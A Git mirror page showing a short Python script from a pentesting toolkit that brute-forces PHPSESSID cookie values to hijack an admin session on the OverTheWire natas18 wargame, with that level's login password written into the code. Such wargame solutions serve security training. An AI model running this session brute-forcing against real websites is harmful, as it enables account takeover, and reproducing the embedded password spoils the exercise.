Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 19:16:08 -04:00
Code Issues Packages Projects Releases Wiki Activity
sec-pentesting-toolkit/Web_Security/user_id/sqli_19_cookie_auth.py
Mari Wahl a36bde60b7 WebHacking: README, urllib2 scripts
2014-12-29 13:06:07 -05:00

34 lines
671 B
Python
Raw Blame History

#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + str(i)}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)
Reference in New Issue View Git Blame Copy Permalink